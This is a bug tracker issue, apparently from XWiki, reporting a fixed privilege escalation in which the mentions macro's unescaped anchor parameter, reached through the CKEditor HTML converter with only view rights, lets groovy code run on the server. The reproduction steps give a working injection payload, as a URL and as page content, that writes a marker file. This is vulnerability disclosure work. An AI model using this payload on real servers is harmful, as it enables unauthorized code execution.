Details
-
Bug
-
Resolution: Fixed
-
Blocker
-
12.5-rc-1
-
None
Description
Steps to reproduce:
Open the URL
<server>/xwiki/bin/view/Main?sheet=CKEditor.HTMLConverter&language=en&sourceSyntax=xwiki%252F2.1&stripHTMLEnvelope=true&fromHTML=false&toHTML=true&text=%7B%7Bmention%20reference%3D%22XWiki.Translation%22%20anchor%3D%22%7B%7B%2Fhtml~%7D~%7D%7B%7Basync%20async%3D~%22true~%22%20cached%3D~%22false~%22%20context%3D~%22doc.reference~%22~%7D~%7D%7B%7Bgroovy~%7D~%7Dnew%20File(~%22%2Ftmp%2Fexploit.txt~%22).withWriter%20%7B%20out%20-%3E%20out.println(~%22owned!~%22)%3B%20%7D%7B%7B%2Fgroovy~%7D~%7D%7B%7B%2Fasync~%7D~%7D%22%2F%7D%7D
Alternatively:
Create a page with content
{{mention reference="XWiki.Translation" anchor="{{/html~}~}{{async async=~"true~" cached=~"false~" context=~"doc.reference~"~}~}{{groovy~}~}new File(~"/tmp/exploit.txt~").withWriter { out -> out.println(~"owned!~"); }{{/groovy~}~}{{/async~}~}"/}}
(or insert this in the description of the user profile).
Expected result
No file /tmp/exploit.txt is created.
Actual result
A file /tmp/exploit.txt with content owned! is created on the server (if the server is running Linux, on Windows this might need to be adjusted to use a different path).
This demonstrates a privilege escalation to programming rights with just view rights through insufficient escaping of parameters in the mentions macro, exploited through the HTML Converter of CKEditor that allows parsing and rendering arbitrary XWiki syntax without edit rights. Alternatively, edit rights on any page (can be the user's profile) are needed.
Attachments
Issue Links
- causes
-
-
- Closed
-
-
-
- Closed
-
- is caused by
-
XWIKI-17421 Support Mentions in platform
-
- Closed
-
- links to